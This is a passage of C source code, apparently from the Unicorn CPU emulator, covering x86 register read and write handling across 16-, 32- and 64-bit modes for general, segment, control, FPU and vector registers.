*(uint64_t *)value = env->regs[R_EDI]; break; case UC_X86_REG_EDI: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_EDI]); break; case UC_X86_REG_DI: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EDI]); break; case UC_X86_REG_DIL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EDI]); break; case UC_X86_REG_RIP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->eip; break; case UC_X86_REG_EIP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->eip); break; case UC_X86_REG_IP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->eip); break; case UC_X86_REG_CS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_CS].selector; break; case UC_X86_REG_DS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_DS].selector; break; case UC_X86_REG_SS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_SS].selector; break; case UC_X86_REG_ES: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_ES].selector; break; case UC_X86_REG_FS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_FS].selector; break; case UC_X86_REG_GS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_GS].selector; break; case UC_X86_REG_R8: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[8]); break; case UC_X86_REG_R8D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[8]); break; case UC_X86_REG_R8W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[8]); break; case UC_X86_REG_R8B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[8]); break; case UC_X86_REG_R9: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[9]); break; case UC_X86_REG_R9D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[9]); break; case UC_X86_REG_R9W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[9]); break; case UC_X86_REG_R9B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[9]); break; case UC_X86_REG_R10: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[10]); break; case UC_X86_REG_R10D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[10]); break; case UC_X86_REG_R10W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[10]); break; case UC_X86_REG_R10B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[10]); break; case UC_X86_REG_R11: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[11]); break; case UC_X86_REG_R11D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[11]); break; case UC_X86_REG_R11W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[11]); break; case UC_X86_REG_R11B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[11]); break; case UC_X86_REG_R12: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[12]); break; case UC_X86_REG_R12D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[12]); break; case UC_X86_REG_R12W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[12]); break; case UC_X86_REG_R12B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[12]); break; case UC_X86_REG_R13: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[13]); break; case UC_X86_REG_R13D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[13]); break; case UC_X86_REG_R13W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[13]); break; case UC_X86_REG_R13B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[13]); break; case UC_X86_REG_R14: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[14]); break; case UC_X86_REG_R14D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[14]); break; case UC_X86_REG_R14W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[14]); break; case UC_X86_REG_R14B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[14]); break; case UC_X86_REG_R15: CHECK_REG_TYPE(int64_t); *(int64_t *)value = READ_QWORD(env->regs[15]); break; case UC_X86_REG_R15D: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[15]); break; case UC_X86_REG_R15W: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[15]); break; case UC_X86_REG_R15B: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[15]); break; case UC_X86_REG_IDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = (uint16_t)env->idt.limit; ((uc_x86_mmr *)value)->base = env->idt.base; break; case UC_X86_REG_GDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = (uint16_t)env->gdt.limit; ((uc_x86_mmr *)value)->base = env->gdt.base; break; case UC_X86_REG_LDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = env->ldt.limit; ((uc_x86_mmr *)value)->base = env->ldt.base; ((uc_x86_mmr *)value)->selector = (uint16_t)env->ldt.selector; ((uc_x86_mmr *)value)->flags = env->ldt.flags; break; case UC_X86_REG_TR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = env->tr.limit; ((uc_x86_mmr *)value)->base = env->tr.base; ((uc_x86_mmr *)value)->selector = (uint16_t)env->tr.selector; ((uc_x86_mmr *)value)->flags = env->tr.flags; break; case UC_X86_REG_MSR: CHECK_REG_TYPE(uc_x86_msr); x86_msr_read(env, (uc_x86_msr *)value); break; case UC_X86_REG_MXCSR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->mxcsr; break; case UC_X86_REG_XMM8: case UC_X86_REG_XMM9: case UC_X86_REG_XMM10: case UC_X86_REG_XMM11: case UC_X86_REG_XMM12: case UC_X86_REG_XMM13: case UC_X86_REG_XMM14: case UC_X86_REG_XMM15: { CHECK_REG_TYPE(float64[2]); float64 *dst = (float64 *)value; ZMMReg *reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_XMM0]; dst[0] = reg->ZMM_Q(0); dst[1] = reg->ZMM_Q(1); break; } case UC_X86_REG_FS_BASE: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = (uint64_t)env->segs[R_FS].base; break; case UC_X86_REG_GS_BASE: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = (uint64_t)env->segs[R_GS].base; break; } break; #endif } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUX86State *env = _env; uc_err ret = UC_ERR_ARG; switch (regid) { default: break; case UC_X86_REG_FP0: case UC_X86_REG_FP1: case UC_X86_REG_FP2: case UC_X86_REG_FP3: case UC_X86_REG_FP4: case UC_X86_REG_FP5: case UC_X86_REG_FP6: case UC_X86_REG_FP7: { CHECK_REG_TYPE(char[10]); uint64_t mant = *(uint64_t *)value; uint16_t upper = *(uint16_t *)((char *)value + sizeof(uint64_t)); env->fpregs[regid - UC_X86_REG_FP0].d = cpu_set_fp80(mant, upper); return ret; } case UC_X86_REG_FPSW: { CHECK_REG_TYPE(uint16_t); uint16_t fpus = *(uint16_t *)value; env->fpus = fpus & ~0x3800; env->fpstt = (fpus >> 11) & 0x7; return ret; } case UC_X86_REG_FPCW: CHECK_REG_TYPE(uint16_t); cpu_set_fpuc(env, *(uint16_t *)value); return ret; case UC_X86_REG_FPTAG: { CHECK_REG_TYPE(uint16_t); int i; uint16_t fptag = *(uint16_t *)value; for (i = 0; i < 8; i++) { env->fptags[i] = ((fptag & 3) == 3); fptag >>= 2; } return ret; } case UC_X86_REG_XMM0: case UC_X86_REG_XMM1: case UC_X86_REG_XMM2: case UC_X86_REG_XMM3: case UC_X86_REG_XMM4: case UC_X86_REG_XMM5: case UC_X86_REG_XMM6: case UC_X86_REG_XMM7: { CHECK_REG_TYPE(float64[2]); float64 *src = (float64 *)value; ZMMReg *reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_XMM0]; reg->ZMM_Q(0) = src[0]; reg->ZMM_Q(1) = src[1]; return ret; } case UC_X86_REG_ST0: case UC_X86_REG_ST1: case UC_X86_REG_ST2: case UC_X86_REG_ST3: case UC_X86_REG_ST4: case UC_X86_REG_ST5: case UC_X86_REG_ST6: case UC_X86_REG_ST7: { CHECK_REG_TYPE(char[10]); memcpy(&FPST(regid - UC_X86_REG_ST0), value, 10); return ret; } case UC_X86_REG_YMM0: case UC_X86_REG_YMM1: case UC_X86_REG_YMM2: case UC_X86_REG_YMM3: case UC_X86_REG_YMM4: case UC_X86_REG_YMM5: case UC_X86_REG_YMM6: case UC_X86_REG_YMM7: case UC_X86_REG_YMM8: case UC_X86_REG_YMM9: case UC_X86_REG_YMM10: case UC_X86_REG_YMM11: case UC_X86_REG_YMM12: case UC_X86_REG_YMM13: case UC_X86_REG_YMM14: case UC_X86_REG_YMM15: { CHECK_REG_TYPE(float64[4]); float64 *src = (float64 *)value; ZMMReg *lo_reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_YMM0]; XMMReg *hi_reg = &env->ymmh_regs[regid - UC_X86_REG_YMM0]; lo_reg->ZMM_Q(0) = src[0]; lo_reg->ZMM_Q(1) = src[1]; // YMM is not supported by QEMU at all // As of qemu 5.0.1, ymmh_regs is nowhere used. hi_reg->_d[0] = src[2]; hi_reg->_d[1] = src[3]; return ret; } case UC_X86_REG_FIP: CHECK_REG_TYPE(uint64_t); env->fpip = *(uint64_t *)value; return ret; case UC_X86_REG_FCS: CHECK_REG_TYPE(uint16_t); env->fpcs = *(uint16_t *)value; return ret; case UC_X86_REG_FDP: CHECK_REG_TYPE(uint64_t); env->fpdp = *(uint64_t *)value; return ret; case UC_X86_REG_FDS: CHECK_REG_TYPE(uint16_t); env->fpds = *(uint16_t *)value; return ret; case UC_X86_REG_FOP: CHECK_REG_TYPE(uint16_t); env->fpop = *(uint16_t *)value; return ret; } switch (mode) { default: break; case UC_MODE_16: switch (regid) { default: break; case UC_X86_REG_ES: CHECK_REG_TYPE(uint16_t); load_seg_16_helper(env, R_ES, *(uint16_t *)value); return ret; case UC_X86_REG_SS: CHECK_REG_TYPE(uint16_t); load_seg_16_helper(env, R_SS, *(uint16_t *)value); return ret; case UC_X86_REG_DS: CHECK_REG_TYPE(uint16_t); load_seg_16_helper(env, R_DS, *(uint16_t *)value); return ret; case UC_X86_REG_FS: CHECK_REG_TYPE(uint16_t); load_seg_16_helper(env, R_FS, *(uint16_t *)value); return ret; case UC_X86_REG_GS: CHECK_REG_TYPE(uint16_t); load_seg_16_helper(env, R_GS, *(uint16_t *)value); return ret; } // fall-thru case UC_MODE_32: switch (regid) { default: break; case UC_X86_REG_CR0: CHECK_REG_TYPE(uint32_t); cpu_x86_update_cr0(env, *(uint32_t *)value); goto write_cr; case UC_X86_REG_CR1: case UC_X86_REG_CR2: case UC_X86_REG_CR3: CHECK_REG_TYPE(uint32_t); cpu_x86_update_cr3(env, *(uint32_t *)value); goto write_cr; case UC_X86_REG_CR4: CHECK_REG_TYPE(uint32_t); cpu_x86_update_cr4(env, *(uint32_t *)value); write_cr: env->cr[regid - UC_X86_REG_CR0] = *(uint32_t *)value; break; case UC_X86_REG_DR0: case UC_X86_REG_DR1: case UC_X86_REG_DR2: case UC_X86_REG_DR3: case UC_X86_REG_DR4: case UC_X86_REG_DR5: case UC_X86_REG_DR6: case UC_X86_REG_DR7: CHECK_REG_TYPE(uint32_t); env->dr[regid - UC_X86_REG_DR0] = *(uint32_t *)value; break; case UC_X86_REG_FLAGS: CHECK_REG_TYPE(uint16_t); cpu_load_eflags(env, *(uint16_t *)value, -1); break; case UC_X86_REG_EFLAGS: CHECK_REG_TYPE(uint32_t); cpu_load_eflags(env, *(uint32_t *)value, -1); break; case UC_X86_REG_EAX: CHECK_REG_TYPE(uint32_t); env->regs[R_EAX] = *(uint32_t *)value; break; case UC_X86_REG_AX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EAX], *(uint16_t *)value); break; case UC_X86_REG_AH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EAX], *(uint8_t *)value); break; case UC_X86_REG_AL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EAX], *(uint8_t *)value); break; case UC_X86_REG_EBX: CHECK_REG_TYPE(uint32_t); env->regs[R_EBX] = *(uint32_t *)value; break; case UC_X86_REG_BX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EBX], *(uint16_t *)value); break; case UC_X86_REG_BH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EBX], *(uint8_t *)value); break; case UC_X86_REG_BL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EBX], *(uint8_t *)value); break; case UC_X86_REG_ECX: CHECK_REG_TYPE(uint32_t); env->regs[R_ECX] = *(uint32_t *)value; break; case UC_X86_REG_CX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ECX], *(uint16_t *)value); break; case UC_X86_REG_CH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_ECX], *(uint8_t *)value); break; case UC_X86_REG_CL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_ECX], *(uint8_t *)value); break; case UC_X86_REG_EDX: CHECK_REG_TYPE(uint32_t); env->regs[R_EDX] = *(uint32_t *)value; break; case UC_X86_REG_DX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EDX], *(uint16_t *)value); break; case UC_X86_REG_DH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EDX], *(uint8_t *)value); break; case UC_X86_REG_DL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EDX], *(uint8_t *)value); break; case UC_X86_REG_ESP: CHECK_REG_TYPE(uint32_t); env->regs[R_ESP] = *(uint32_t *)value; break; case UC_X86_REG_SP: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ESP], *(uint16_t *)value); break; case UC_X86_REG_EBP: CHECK_REG_TYPE(uint32_t); env->regs[R_EBP] = *(uint32_t *)value; break; case UC_X86_REG_BP: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EBP], *(uint16_t *)value); break; case UC_X86_REG_ESI: CHECK_REG_TYPE(uint32_t); env->regs[R_ESI] = *(uint32_t *)value; break; case UC_X86_REG_SI: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ESI], *(uint16_t *)value); break; case UC_X86_REG_EDI: CHECK_REG_TYPE(uint32_t); env->regs[R_EDI] = *(uint32_t *)value; break; case UC_X86_REG_DI: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EDI], *(uint16_t *)value); break; case UC_X86_REG_EIP: CHECK_REG_TYPE(uint32_t); env->eip = *(uint32_t *)value; *setpc = 1; break; case UC_X86_REG_IP: CHECK_REG_TYPE(uint16_t); env->eip = *(uint16_t *)value; *setpc = 1; break; case UC_X86_REG_CS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_CS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_CS, *(uint16_t *)value); break; case UC_X86_REG_DS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_DS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_DS, *(uint16_t *)value); break; case UC_X86_REG_SS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_SS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_SS, *(uint16_t *)value); break; case UC_X86_REG_ES: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_ES, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_ES, *(uint16_t *)value); break; case UC_X86_REG_FS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_FS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_FS, *(uint16_t *)value); break; case UC_X86_REG_GS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_GS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_GS, *(uint16_t *)value); break; case UC_X86_REG_IDTR: CHECK_REG_TYPE(uc_x86_mmr); env->idt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; env->idt.base = (uint32_t)((uc_x86_mmr *)value)->base; break; case UC_X86_REG_GDTR: CHECK_REG_TYPE(uc_x86_mmr); env->gdt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; env->gdt.base = (uint32_t)((uc_x86_mmr *)value)->base; break; case UC_X86_REG_LDTR: CHECK_REG_TYPE(uc_x86_mmr); env->ldt.limit = ((uc_x86_mmr *)value)->limit; env->ldt.base = (uint32_t)((uc_x86_mmr *)value)->base; env->ldt.selector = (uint16_t)((uc_x86_mmr *)value)->selector; env->ldt.flags = ((uc_x86_mmr *)value)->flags; break; case UC_X86_REG_TR: CHECK_REG_TYPE(uc_x86_mmr); env->tr.limit = ((uc_x86_mmr *)value)->limit; env->tr.base = (uint32_t)((uc_x86_mmr *)value)->base; env->tr.selector = (uint16_t)((uc_x86_mmr *)value)->selector; env->tr.flags = ((uc_x86_mmr *)value)->flags; break; case UC_X86_REG_MSR: CHECK_REG_TYPE(uc_x86_msr); x86_msr_write(env, (uc_x86_msr *)value); break; case UC_X86_REG_MXCSR: CHECK_REG_TYPE(uint32_t); cpu_set_mxcsr(env, *(uint32_t *)value); break; /* // Don't think base registers are a "thing" on x86 case UC_X86_REG_FS_BASE: CHECK_REG_TYPE(uint32_t); env->segs[R_FS].base = *(uint32_t *)value; continue; case UC_X86_REG_GS_BASE: CHECK_REG_TYPE(uint32_t); env->segs[R_GS].base = *(uint32_t *)value; continue; */ } break; #ifdef TARGET_X86_64 case UC_MODE_64: switch (regid) { default: break; case UC_X86_REG_CR0: CHECK_REG_TYPE(uint64_t); cpu_x86_update_cr0(env, *(uint32_t *)value); goto write_cr64; case UC_X86_REG_CR1: case UC_X86_REG_CR2: case UC_X86_REG_CR3: CHECK_REG_TYPE(uint64_t); cpu_x86_update_cr3(env, *(uint32_t *)value); goto write_cr64; case UC_X86_REG_CR4: CHECK_REG_TYPE(uint64_t); cpu_x86_update_cr4(env, *(uint32_t *)value); write_cr64: env->cr[regid - UC_X86_REG_CR0] = *(uint64_t *)value; break; case UC_X86_REG_DR0: case UC_X86_REG_DR1: case UC_X86_REG_DR2: case UC_X86_REG_DR3: case UC_X86_REG_DR4: case UC_X86_REG_DR5: case UC_X86_REG_DR6: case UC_X86_REG_DR7: CHECK_REG_TYPE(uint64_t); env->dr[regid - UC_X86_REG_DR0] = *(uint64_t *)value; break; case UC_X86_REG_FLAGS: CHECK_REG_TYPE(uint16_t); cpu_load_eflags(env, *(uint16_t *)value, -1); break; case UC_X86_REG_EFLAGS: CHECK_REG_TYPE(uint32_t); cpu_load_eflags(env, *(uint32_t *)value, -1); break; case UC_X86_REG_RFLAGS: CHECK_REG_TYPE(uint64_t); cpu_load_eflags(env, *(uint64_t *)value, -1); break; case UC_X86_REG_RAX: CHECK_REG_TYPE(uint64_t); env->regs[R_EAX] = *(uint64_t *)value; break; case UC_X86_REG_EAX: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_EAX], *(uint32_t *)value); break; case UC_X86_REG_AX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EAX], *(uint16_t *)value); break; case UC_X86_REG_AH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EAX], *(uint8_t *)value); break; case UC_X86_REG_AL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EAX], *(uint8_t *)value); break; case UC_X86_REG_RBX: CHECK_REG_TYPE(uint64_t); env->regs[R_EBX] = *(uint64_t *)value; break; case UC_X86_REG_EBX: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_EBX], *(uint32_t *)value); break; case UC_X86_REG_BX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EBX], *(uint16_t *)value); break; case UC_X86_REG_BH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EBX], *(uint8_t *)value); break; case UC_X86_REG_BL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EBX], *(uint8_t *)value); break; case UC_X86_REG_RCX: CHECK_REG_TYPE(uint64_t); env->regs[R_ECX] = *(uint64_t *)value; break; case UC_X86_REG_ECX: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_ECX], *(uint32_t *)value); break; case UC_X86_REG_CX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ECX], *(uint16_t *)value); break; case UC_X86_REG_CH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_ECX], *(uint8_t *)value); break; case UC_X86_REG_CL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_ECX], *(uint8_t *)value); break; case UC_X86_REG_RDX: CHECK_REG_TYPE(uint64_t); env->regs[R_EDX] = *(uint64_t *)value; break; case UC_X86_REG_EDX: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_EDX], *(uint32_t *)value); break; case UC_X86_REG_DX: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EDX], *(uint16_t *)value); break; case UC_X86_REG_DH: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_H(env->regs[R_EDX], *(uint8_t *)value); break; case UC_X86_REG_DL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EDX], *(uint8_t *)value); break; case UC_X86_REG_RSP: CHECK_REG_TYPE(uint64_t); env->regs[R_ESP] = *(uint64_t *)value; break; case UC_X86_REG_ESP: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_ESP], *(uint32_t *)value); break; case UC_X86_REG_SP: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ESP], *(uint16_t *)value); break; case UC_X86_REG_SPL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_ESP], *(uint8_t *)value); break; case UC_X86_REG_RBP: CHECK_REG_TYPE(uint64_t); env->regs[R_EBP] = *(uint64_t *)value; break; case UC_X86_REG_EBP: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_EBP], *(uint32_t *)value); break; case UC_X86_REG_BP: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EBP], *(uint16_t *)value); break; case UC_X86_REG_BPL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EBP], *(uint8_t *)value); break; case UC_X86_REG_RSI: CHECK_REG_TYPE(uint64_t); env->regs[R_ESI] = *(uint64_t *)value; break; case UC_X86_REG_ESI: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_ESI], *(uint32_t *)value); break; case UC_X86_REG_SI: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_ESI], *(uint16_t *)value); break; case UC_X86_REG_SIL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_ESI], *(uint8_t *)value); break; case UC_X86_REG_RDI: CHECK_REG_TYPE(uint64_t); env->regs[R_EDI] = *(uint64_t *)value; break; case UC_X86_REG_EDI: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[R_EDI], *(uint32_t *)value); break; case UC_X86_REG_DI: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[R_EDI], *(uint16_t *)value); break; case UC_X86_REG_DIL: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[R_EDI], *(uint8_t *)value); break; case UC_X86_REG_RIP: CHECK_REG_TYPE(uint64_t); env->eip = *(uint64_t *)value; *setpc = 1; break; case UC_X86_REG_EIP: CHECK_REG_TYPE(uint32_t); env->eip = *(uint32_t *)value; *setpc = 1; break; case UC_X86_REG_IP: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->eip, *(uint16_t *)value); *setpc = 1; break; case UC_X86_REG_CS: CHECK_REG_TYPE(uint16_t); env->segs[R_CS].selector = *(uint16_t *)value; break; case UC_X86_REG_DS: CHECK_REG_TYPE(uint16_t); env->segs[R_DS].selector = *(uint16_t *)value; break; case UC_X86_REG_SS: CHECK_REG_TYPE(uint16_t); env->segs[R_SS].selector = *(uint16_t *)value; break; case UC_X86_REG_ES: CHECK_REG_TYPE(uint16_t); env->segs[R_ES].selector = *(uint16_t *)value; break; case UC_X86_REG_FS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_FS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_FS, *(uint16_t *)value); break; case UC_X86_REG_GS: CHECK_REG_TYPE(uint16_t); ret = uc_check_cpu_x86_load_seg(env, R_GS, *(uint16_t *)value); if (ret) { return ret; } cpu_x86_load_seg(env, R_GS, *(uint16_t *)value); break; case UC_X86_REG_R8: CHECK_REG_TYPE(uint64_t); env->regs[8] = *(uint64_t *)value; break; case UC_X86_REG_R8D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[8], *(uint32_t *)value); break; case UC_X86_REG_R8W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[8], *(uint16_t *)value); break; case UC_X86_REG_R8B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[8], *(uint8_t *)value); break; case UC_X86_REG_R9: CHECK_REG_TYPE(uint64_t); env->regs[9] = *(uint64_t *)value; break; case UC_X86_REG_R9D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[9], *(uint32_t *)value); break; case UC_X86_REG_R9W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[9], *(uint16_t *)value); break; case UC_X86_REG_R9B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[9], *(uint8_t *)value); break; case UC_X86_REG_R10: CHECK_REG_TYPE(uint64_t); env->regs[10] = *(uint64_t *)value; break; case UC_X86_REG_R10D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[10], *(uint32_t *)value); break; case UC_X86_REG_R10W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[10], *(uint16_t *)value); break; case UC_X86_REG_R10B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[10], *(uint8_t *)value); break; case UC_X86_REG_R11: CHECK_REG_TYPE(uint64_t); env->regs[11] = *(uint64_t *)value; break; case UC_X86_REG_R11D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[11], *(uint32_t *)value); break; case UC_X86_REG_R11W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[11], *(uint16_t *)value); break; case UC_X86_REG_R11B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[11], *(uint8_t *)value); break; case UC_X86_REG_R12: CHECK_REG_TYPE(uint64_t); env->regs[12] = *(uint64_t *)value; break; case UC_X86_REG_R12D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[12], *(uint32_t *)value); break; case UC_X86_REG_R12W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[12], *(uint16_t *)value); break; case UC_X86_REG_R12B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[12], *(uint8_t *)value); break; case UC_X86_REG_R13: CHECK_REG_TYPE(uint64_t); env->regs[13] = *(uint64_t *)value; break; case UC_X86_REG_R13D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[13], *(uint32_t *)value); break; case UC_X86_REG_R13W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[13], *(uint16_t *)value); break; case UC_X86_REG_R13B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[13], *(uint8_t *)value); break; case UC_X86_REG_R14: CHECK_REG_TYPE(uint64_t); env->regs[14] = *(uint64_t *)value; break; case UC_X86_REG_R14D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[14], *(uint32_t *)value); break; case UC_X86_REG_R14W: CHECK_REG_TYPE(uint16_t); WRITE_WORD(env->regs[14], *(uint16_t *)value); break; case UC_X86_REG_R14B: CHECK_REG_TYPE(uint8_t); WRITE_BYTE_L(env->regs[14], *(uint8_t *)value); break; case UC_X86_REG_R15: CHECK_REG_TYPE(uint64_t); env->regs[15] = *(uint64_t *)value; break; case UC_X86_REG_R15D: CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->regs[15], *(uint32_t *)value); break; case UC_X86_REG_R15W: 